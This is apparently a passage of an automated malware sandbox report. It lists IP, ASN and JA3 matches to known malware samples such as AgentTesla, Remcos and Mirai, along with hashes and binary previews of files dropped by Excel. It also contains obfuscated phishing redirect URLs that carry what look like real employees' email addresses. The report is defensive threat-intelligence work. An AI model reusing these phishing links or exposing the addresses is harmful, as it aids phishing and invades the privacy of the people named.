                                                                                                api.ipify.orghttps://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.comGet hashmaliciousUnknownBrowse
                                                                                                • 172.67.74.152
                                                                                                https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rmgfuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.comGet hashmaliciousUnknownBrowse
                                                                                                • 172.67.74.152
                                                                                                https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=olgelfuabFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.comGet hashmaliciousUnknownBrowse
                                                                                                • 104.26.13.205
                                                                                                drop1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                • 172.67.74.152
                                                                                                drop1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                • 104.26.13.205
                                                                                                Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                • 104.26.12.205
                                                                                                Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                • 104.26.13.205
                                                                                                file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                • 104.26.12.205
                                                                                                http://www.cipassoitalia.it/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                • 172.67.74.152
                                                                                                https://telegra.ph/Clarkson-122025-01-02Get hashmaliciousUnknownBrowse
                                                                                                • 104.26.12.205

                                                                                                ASNs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                CLOUDFLARENETUSun30brGAKP.exeGet hashmaliciousLummaCBrowse
                                                                                                • 188.114.97.3
                                                                                                P3A946MOFP.exeGet hashmaliciousXWormBrowse
                                                                                                • 162.159.135.234
                                                                                                kP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 188.114.97.3
                                                                                                https://u46509964.ct.sendgrid.net/ls/click?upn=u001.yzEgCXNOtR0g3VDqrfESrp2R1cF5ldZEX7V8PkOFzM7ruCjjHr3jp5RGL8GduYU-2BjhHflFlXWDZcLxMTl-2BOf3Q-3D-3Dypty_wgMyjr7kuwn9YAatYj1Mf4g8ovXgJAxpM0PlHYE9e6HZUYNSU5hkcVbHbQ0q5E6I3Vn1iKBKWI4PPg-2BCiKeQ2OE0mP0AQHbDintLIvkOVimerxUzun3ony9NL1yVRuA4WQuNzjMCPVhNshNaKMXqQsMtvsckMLkqRAU-2FNXREyY4h03-2BUaA2tGQGT4QuateFiuKuJahSkLVnvCQKkIZcpO3aNqWzyxlmipL9FIlHPuq9M09y6kh5iIlWeVT6v9HaNCeK7mNRfTM-2FaE-2FYlUjqPiHlgW1bQDf4vc-2B8bTW2XnnwQ3OD-2BHpj1pVnq8E-2B5KWyk-2BdpGzJAivJFYRAm0bkM-2FBffGjfgcs9NuM6kyERGkXLWY0YDwCJHP0W3vRM98XO8M2QRiYbYEh4a80qwygvsII8yUtWb452P35A7kazo2Bsi9HmjZL32fVK2Kj1rsDSpFE2-2FPz5MkH0YdERZv2D9LaOR2CGCCtOzFgtqISzhm5DNl8sQN1HGl9yl3sxCQ2TXG-2B2-2FQIL0ayfUBJHiJurB3Y0z5HdmkhdTnyWYqM9SpbJkxNnfJXP5NAUZTA0q1B3cuqIcfJ8Gdtm1IuXC9fLcGQFLP2A1GLVH6tFOcbPu-2F-2FO5Evswi23nrB2CFvf3EAjbRLMMYTn-2FzVKiL-2FLRKqLChrdjv6iJ364jG39-2BR-2BRXc7k2MN4PqhyBkuDYVO6KJhJtr7VWQ1JkGgezZvQKBz4Vi6Gq0ytsGLOZnihpIPww05MHzIdOzD94b48OUKOeaeHavlRK5pXSjQ7zOPyDnUSjdCJ-2FLEEq4EOGwcWXvvFjweg-2BQEsFRU1KoSIvsY-2FcQgpMyEYXStCMiKHT4WQ7TMDjBOR3rhCh2QliVs-2FI1-2BSi-2FjGbWAd30KPG-2F7b4L3CtlRajP3-2BEOcqU3Jvnbxu8AdSEg-2F0bY3U9Rsq-2FRYamf2McJIE0i0zbXhYCXRm3cXwuZg-2Fn9ed9-2FBCSIqPn-2B7Kqqgzm-2FKg-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                • 1.1.1.1
                                                                                                https://u46509964.ct.sendgrid.net/ls/click?upn=u001.yzEgCXNOtR0g3VDqrfESrp2R1cF5ldZEX7V8PkOFzM7ruCjjHr3jp5RGL8GduYU-2BjhHflFlXWDZcLxMTl-2BOf3Q-3D-3Dypty_wgMyjr7kuwn9YAatYj1Mf4g8ovXgJAxpM0PlHYE9e6HZUYNSU5hkcVbHbQ0q5E6I3Vn1iKBKWI4PPg-2BCiKeQ2OE0mP0AQHbDintLIvkOVimerxUzun3ony9NL1yVRuA4WQuNzjMCPVhNshNaKMXqQsMtvsckMLkqRAU-2FNXREyY4h03-2BUaA2tGQGT4QuateFiuKuJahSkLVnvCQKkIZcpO3aNqWzyxlmipL9FIlHPuq9M09y6kh5iIlWeVT6v9HaNCeK7mNRfTM-2FaE-2FYlUjqPiHlgW1bQDf4vc-2B8bTW2XnnwQ3OD-2BHpj1pVnq8E-2B5KWyk-2BdpGzJAivJFYRAm0bkM-2FBffGjfgcs9NuM6kyERGkXLWY0YDwCJHP0W3vRM98XO8M2QRiYbYEh4a80qwygvsII8yUtWb452P35A7kazo2Bsi9HmjZL32fVK2Kj1rsDSpFE2-2FPz5MkH0YdERZv2D9LaOR2CGCCtOzFgtqISzhm5DNl8sQN1HGl9yl3sxCQ2TXG-2B2-2FQIL0ayfUBJHiJurB3Y0z5HdmkhdTnyWYqM9SpbJkxNnfJXP5NAUZTA0q1B3cuqIcfJ8Gdtm1IuXC9fLcGQFLP2A1GLVH6tFOcbPu-2F-2FO5Evswi23nrB2CFvf3EAjbRLMMYTn-2FzVKiL-2FLRKqLChrdjv6iJ364jG39-2BR-2BRXc7k2MN4PqhyBkuDYVO6KJhJtr7VWQ1JkGgezZvQKBz4Vi6Gq0ytsGLOZnihpIPww05MHzIdOzD94b48OUKOeaeHavlRK5pXSjQ7zOPyDnUSjdCJ-2FLEEq4EOGwcWXvvFjweg-2BQEsFRU1KoSIvsY-2FcQgpMyEYXStCMiKHT4WQ7TMDjBOR3rhCh2QliVs-2FI1-2BSi-2FjGbWAd30KPG-2F7b4L3CtlRajP3-2BEOcqU3Jvnbxu8AdSEg-2F0bY3U9Rsq-2FRYamf2McJIE0i0zbXhYCXRm3cXwuZg-2Fn9ed9-2FBCSIqPn-2B7Kqqgzm-2FKg-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                • 1.1.1.1
                                                                                                https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.comGet hashmaliciousUnknownBrowse
                                                                                                • 172.67.74.152
                                                                                                https://pdf-ezy.com/pdf-ezy.exeGet hashmaliciousUnknownBrowse
                                                                                                • 172.67.152.3
                                                                                                https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rmgfuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.comGet hashmaliciousUnknownBrowse
                                                                                                • 172.67.74.152
                                                                                                https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=olgelfuabFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.comGet hashmaliciousUnknownBrowse
                                                                                                • 104.26.13.205
                                                                                                VIVIDHOSTINGUSRef#20203216.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 162.254.34.31
                                                                                                arm4.elfGet hashmaliciousMiraiBrowse
                                                                                                • 192.154.238.20
                                                                                                Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 162.254.34.31
                                                                                                Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 162.254.34.31
                                                                                                DJ5PhUwOsM.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                                • 162.254.34.31
                                                                                                Ref#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                                • 162.254.34.31
                                                                                                sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                • 192.26.155.193
                                                                                                Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                • 162.254.34.31
                                                                                                Ref#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                • 162.254.34.31
                                                                                                BankInformation.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 162.254.34.31
                                                                                                HOSTSLICK-GERMANYNLRef#20203216.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 5.253.86.15
                                                                                                Ref_31020563.exeGet hashmaliciousUnknownBrowse
                                                                                                • 5.253.86.15
                                                                                                Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 5.253.86.15
                                                                                                Ref#1550238.exeGet hashmaliciousUnknownBrowse
                                                                                                • 5.253.86.15
                                                                                                an_api.exeGet hashmaliciousUnknownBrowse
                                                                                                • 193.142.146.64
                                                                                                licarisan_api.exeGet hashmaliciousIcarusBrowse
                                                                                                • 193.142.146.64
                                                                                                an_api.exeGet hashmaliciousUnknownBrowse
                                                                                                • 193.142.146.64
                                                                                                build.exeGet hashmaliciousUnknownBrowse
                                                                                                • 193.142.146.64
                                                                                                ub16vsLP6y.zipGet hashmaliciousRemcosBrowse
                                                                                                • 193.142.146.203
                                                                                                ISehgzqm2V.zipGet hashmaliciousRemcosBrowse
                                                                                                • 193.142.146.203

                                                                                                JA3 Fingerprints

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                3b5074b1b5d032e5620f69f9f700ff0ekP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 104.26.12.205
                                                                                                • 5.253.86.15
                                                                                                ny9LDJr6pA.exeGet hashmaliciousQuasarBrowse
                                                                                                • 104.26.12.205
                                                                                                • 5.253.86.15
                                                                                                jaTDEkWCbs.exeGet hashmaliciousQuasarBrowse
                                                                                                • 104.26.12.205
                                                                                                • 5.253.86.15
                                                                                                3LcZO15oTC.exeGet hashmaliciousUnknownBrowse
                                                                                                • 104.26.12.205
                                                                                                • 5.253.86.15
                                                                                                3LcZO15oTC.exeGet hashmaliciousUnknownBrowse
                                                                                                • 104.26.12.205
                                                                                                • 5.253.86.15
                                                                                                elyho3x5zz.exeGet hashmaliciousUnknownBrowse
                                                                                                • 104.26.12.205
                                                                                                • 5.253.86.15
                                                                                                17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                • 104.26.12.205
                                                                                                • 5.253.86.15
                                                                                                elyho3x5zz.exeGet hashmaliciousUnknownBrowse
                                                                                                • 104.26.12.205
                                                                                                • 5.253.86.15
                                                                                                Tax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
                                                                                                • 104.26.12.205
                                                                                                • 5.253.86.15

                                                                                                Dropped Files

                                                                                                No context

                                                                                                Created / dropped Files

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):118
                                                                                                Entropy (8bit):3.5700810731231707
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                MD5:573220372DA4ED487441611079B623CD
                                                                                                SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                Malicious:false
                                                                                                Reputation:high, very likely benign file
                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                                                                                C:\Users\user\AppData\Local\Temp\excel_doc.xlsx

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\Ref#66001032.exe
                                                                                                File Type:Microsoft Excel 2007+
                                                                                                Category:dropped
                                                                                                Size (bytes):263638
                                                                                                Entropy (8bit):6.618663336984656
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:z0K7BgwHpRZAKDmeEyz27GIeiTKOq7rqpm9nrdM63/rmtVyf+i3dGZUpuhzWUYTN:z04Dfvz27Gl1qpm9rLSuRtlZ
                                                                                                MD5:F8C54480E819D1F6B150CC500447393F
                                                                                                SHA1:D0C36AF14EBD87343C147B618E4F6D8137996F96
                                                                                                SHA-256:47629DCCC78E703BE615AC7C67EBC4AF2B19D1F63C67362EEE820DC94814A268
                                                                                                SHA-512:96FACBEB01A38B9085255191AE0213A6CB28D213A1A92B444732123A441A742CC6CB5DCBE08643621191C941F8C5AF35DAA89C135A9DA870E859C689C5EA2ACE
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:PK..........!.%k.xK...........[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................WM..0..W...r]..[..*`....]i....b....X...;..E@B..%v>.73.{2...*...q~[.....R..8.5.6..g.........B~?y.n4.9..Y.0.KD... J.<...7..5G..K.X.%....#.. ..`..'./......[z\+.+.g...H5.s...I(..yD2.... .Xk.....e(.PW....# .c!g'9.Y.q*.5..-<T.:..8.d.\..r.u.!.9...v.#..@m%T7..|.IK.+......k...V......UqY..Ji+4W.........p..._.n.......g.....Qq..-..G.B.......$..B.q."z.zN......w..M_.61..|D.w...x..C..X.oQ....mjc...8..MJ"!7..?......=PS....

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (3041), with CRLF, LF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):3873
                                                                                                Entropy (8bit):5.13205641560811
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:07vexwKUYp0i4nq+0Bhq2h7RnHi8VsU7H9/P26i0yFFVA4:xISCa6VB
                                                                                                MD5:0878AB38209E20D255F26F4386A1C7FB
                                                                                                SHA1:82BC6719BDCB81E9E5F0D2D03FD249FA7333E5B1
                                                                                                SHA-256:5029BDDBA6BB3C65E668CF8A99F0629375E6E1C0BC9819E1D04E992829D74A27
                                                                                                SHA-512:5D1495E146F99439722E07FB3F9350280089C15ACF33EB22A96CE3B7623D162EA78A93ADC69B926230E645C4FEC15A6FFEDF6125B8EB2BDB311FE9FBC7DECE10
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:<Load xmlns="http://schemas.microsoft.com/analysisservices/2003/user" xmlns:ddl2="http://schemas.microsoft.com/analysisservices/2003/user/2" xmlns:ddl2_2="http://schemas.microsoft.com/analysisservices/2003/user/2/2" xmlns:ddl100="http://schemas.microsoft.com/analysisservices/2008/user/100" xmlns:ddl100_100="http://schemas.microsoft.com/analysisservices/2008/user/100/100" xmlns:ddl200="http://schemas.microsoft.com/analysisservices/2010/user/200" xmlns:ddl200_200="http://schemas.microsoft.com/analysisservices/2010/user/200/200" xmlns:ddl300="http://schemas.microsoft.com/analysisservices/2011/user/300" xmlns:ddl300_300="http://schemas.microsoft.com/analysisservices/2011/user/300/300" xmlns:ddl400="http://schemas.microsoft.com/analysisservices/2012/user/400" xmlns:ddl400_400="http://schemas.microsoft.com/analysisservices/2012/user/400/400" xmlns:ddl410="http://schemas.microsoft.com/analysisservices/2012/user/410" xmlns:ddl410_410="http://schemas.microsoft.com/analys

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\0.CryptKey.bin

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):168
                                                                                                Entropy (8bit):6.834136247119151
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:1lHKqjZsrNFx/Ftl2LAYMPhZ6ZJ3NjeIlCr4fqdCJ8/qpSsNkFk:iqjZsrNF5Fm3MZQZ5x18qqdCJRp+k
                                                                                                MD5:F5F6AE9A9BC26AABEC8192363FA2341E
                                                                                                SHA1:7E1797B28BE0224ED9E9B2CDD016FC9DA5983F17
                                                                                                SHA-256:C51D0DD8821F6686E865A5FD2A7BF09EE1FCA07B7AA99B2856DF5F2C54860643
                                                                                                SHA-512:3C22F1BE37A828C1A7170DF4EC7A00F61C8C2A7F73CD850D79C91278AB91580846B0E1A4CC09F47CE0B7CAE8D98B783A9F442E7809C459091FA55FA6224B67A3
                                                                                                Malicious:false
                                                                                                Preview:.........7.9.].0*j:/........R..I.!o..Z3..26..H...I.#...j...`:..c..@S......y........7oP...^a...7.9..(....'..o......vG.....S\.fE.....rL..,...=.d.&k....N.. ge{].

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\0.H$Loan$Beginning Balance.ID_TO_POS.0.idf

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):520
                                                                                                Entropy (8bit):2.4237157105943106
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:IMiGJDYCFPMmBSwqVnCOZT/ttfc5LA93UBjqvUnCA:IlsDBFnShVlT/ttGLGOjql
                                                                                                MD5:452335E3907F8C381F1DCC8A5659F9CF
                                                                                                SHA1:FB65E72217A2A3A21B65A1B206865C83A04084A5
                                                                                                SHA-256:9F2A59D783DAE8A932F35FC6B2266A67A3E9902047DBF0DF2B124E76D1EE8DD6
                                                                                                SHA-512:1A69D8EDB88101858463D12E0D118C95F2F7121248FD79DF88CBEFF811872CDEF9B224EE61E084B18FAF078F93661AA88CF7133B0EA6A983DE43AE9075BAFF9C
                                                                                                Malicious:false
                                                                                                Preview:=...........y...........w...v...u...t...s...r...q...p...o...n...m...l...k...j...i...g...f...e...d...c...b...a...`..._...^...]...\...[...Z...X...W...V...U...T...S...R...Q...P...O...N...M...L...K...I...H...G...F...E...D...C...B...A...@...?...>...=...;...:...9...8...7...6...5...4...3...2...1...0.......-...,...+...*...)...(...'...&...%...$..."...!... ...................................................................................................................x...h...Y...J...<.../...#...............................

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\0.H$Loan$Beginning Balance.POS_TO_ID.0.idf

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):520
                                                                                                Entropy (8bit):2.4275618644404644
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:IYYCSPMm27wqtnEe2ZTowl/tfcWaLAap3U+yfj4i9:IYBS87ht+TP/t4LBpcfjB9
                                                                                                MD5:C6A6EFE16235C1A0553619F5BC37348B
                                                                                                SHA1:3FE8D90FC25B39E4DE8069E0EA71236E6A03F51F
                                                                                                SHA-256:00C9E92856CAEBCEB16739BE6B820EA3F46FB18C2EF6960C80624FC64C38085D
                                                                                                SHA-512:F4BF69BB137E58A5855B682921E850B3DE33D57C964A04662B989258F657429935C9D073F5A857384982F4DD3CD9C593B9FBC6D4BC4DC2DF99479E6D047C6F6C
                                                                                                Malicious:false
                                                                                                Preview:=.......{...q...p...o...n...m...l...k...j...i...h.......z...g...f...e...d...c...b...a...`..._...^...y...]...\...[...Z...Y...X...W...V...U...T...S...x...R...Q...P...O...N...M...L...K...J...I...H...w...G...F...E...D...C...B...A...@...?...>...=...<...v...;...:...9...8...7...6...5...4...3...2...1...0.../...u.......-...,...+...*...)...(...'...&...%...$...#..."...!...t... .......................................................s...............................................................r...............................

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\0.H$Loan$Ending Balance.ID_TO_POS.0.idf

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):520
                                                                                                Entropy (8bit):2.4237157105943106
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:IMGJDYCdPMmB7wqVnEOZToytfcWRLAal3U+pj4i9vS:IXDBdn7hVnThtHLBlHjB9
                                                                                                MD5:E1422B20684C08E1959AACB8797B732E
                                                                                                SHA1:ECA9AB731001E83B499412D896954BD64023D8DC
                                                                                                SHA-256:A0E16AACDA10C5314C8582966081E0813C217ACFA28654E5A09BAF1A81391703
                                                                                                SHA-512:E411E5B9E47742764555F1C30ED367D0D4D5C31BCB30299D55EADCB76C739ABE4C61DDC396F8F0250719175DB617BA430FF33E71EACB49B2C6DD7AB83F5E1149
                                                                                                Malicious:false
                                                                                                Preview:=...........y.......x...w...v...u...t...s...r...q...p...o...n...m...l...k...j...i...h...g...f...e...d...c...b...a...`..._...^...]...\...[...Z...Y...X...W...V...U...T...S...R...Q...P...O...N...M...L...K...J...I...H...G...F...E...D...C...B...A...@...?...>...=...<...;...:...9...8...7...6...5...4...3...2...1...0.../.......-...,...+...*...)...(...'...&...%...$...#..."...!... ...................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\0.H$Loan$Ending Balance.POS_TO_ID.0.idf

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):520
                                                                                                Entropy (8bit):2.4275618644404644
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:IXeJDYCdPMmB7wqVnEOZToytfcWRLAal3U+pj4i9v:I0DBdn7hVnThtHLBlHjB9
                                                                                                MD5:FE6027666B10B8309F47A240BA861C24
                                                                                                SHA1:7D06BED5F4D78B8207FB1C58D9A9945D892FF2AF
                                                                                                SHA-256:06348313712B5C317A52F54DE5E834072EB18DAE5BE7A1BE0D3B88D320EFD7C0
                                                                                                SHA-512:2A6E53F46CFA341BAE9F97EEC4787B1335646319F6981FBA61ADFB856794F4A896930A0F38C9B0E9225E89DDB3940B5C5C6E252C003268E9DC90B46257A96C3A
                                                                                                Malicious:false
                                                                                                Preview:=.......z...{...y...x...w...v...u...t...s...r...q...p...o...n...m...l...k...j...i...h...g...f...e...d...c...b...a...`..._...^...]...\...[...Z...Y...X...W...V...U...T...S...R...Q...P...O...N...M...L...K...J...I...H...G...F...E...D...C...B...A...@...?...>...=...<...;...:...9...8...7...6...5...4...3...2...1...0.../.......-...,...+...*...)...(...'...&...%...$...#..."...!... ...................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\0.H$Loan$Interest.ID_TO_POS.0.idf

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):520
                                                                                                Entropy (8bit):2.4237157105943106
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:IMGJDYCdPMmB7wqVnEOZToytfcWRLAal3U+pj4i9vC:IXDBdn7hVnThtHLBlHjB9
                                                                                                MD5:074FF54BC184D4BBA85E19D4E363F431
                                                                                                SHA1:E25DC949B4F29ACAC6BDCA70F788F57661C4272D
                                                                                                SHA-256:BDE4374F98677EA4E82E4F0594FED84B38318FD0DF79A88D495C1D4AD9900210
                                                                                                SHA-512:07E1A6134ABDC53672771CF8DFE4713661430BFD81E5A69CF1E95B10E5C7C9331EDEFE797014148342A833F38176F419220145A76FD8EBBE658C024B4F61801B
                                                                                                Malicious:false
                                                                                                Preview:=...........y.......x...w...v...u...t...s...r...q...p...o...n...m...l...k...j...i...h...g...f...e...d...c...b...a...`..._...^...]...\...[...Z...Y...X...W...V...U...T...S...R...Q...P...O...N...M...L...K...J...I...H...G...F...E...D...C...B...A...@...?...>...=...<...;...:...9...8...7...6...5...4...3...2...1...0.../.......-...,...+...*...)...(...'...&...%...$...#..."...!... ...................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\0.H$Loan$Interest.POS_TO_ID.0.idf

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):520
                                                                                                Entropy (8bit):2.4275618644404644
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:IHeJDYCdPMmB7wqVnEOZToytfcWRLAal3U+pj4i9v:IkDBdn7hVnThtHLBlHjB9
                                                                                                MD5:6CBC30D91C215EF3F733971ED972499F
                                                                                                SHA1:25597B645CA5A730CD6040AEE7C8C80102E64E4A
                                                                                                SHA-256:77C4F612773366882C905B572AA2C76725C23A064303533F9BD15E9A3DDA787D
                                                                                                SHA-512:AEEF276B1906A924751D59A053261CD7320DCA0104A46C072961F460EA8B806C5F97C58A4DA342616BB01AD365A6C8F1011DFBDEE48E87E26DB0B064392D0C58
                                                                                                Malicious:false
                                                                                                Preview:=.......{...z...y...x...w...v...u...t...s...r...q...p...o...n...m...l...k...j...i...h...g...f...e...d...c...b...a...`..._...^...]...\...[...Z...Y...X...W...V...U...T...S...R...Q...P...O...N...M...L...K...J...I...H...G...F...E...D...C...B...A...@...?...>...=...<...;...:...9...8...7...6...5...4...3...2...1...0.../.......-...,...+...*...)...(...'...&...%...$...#..."...!... ...................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\0.H$Loan$Payment Date (Month Index).ID_TO_POS.0.idf

                                                                                                Download File
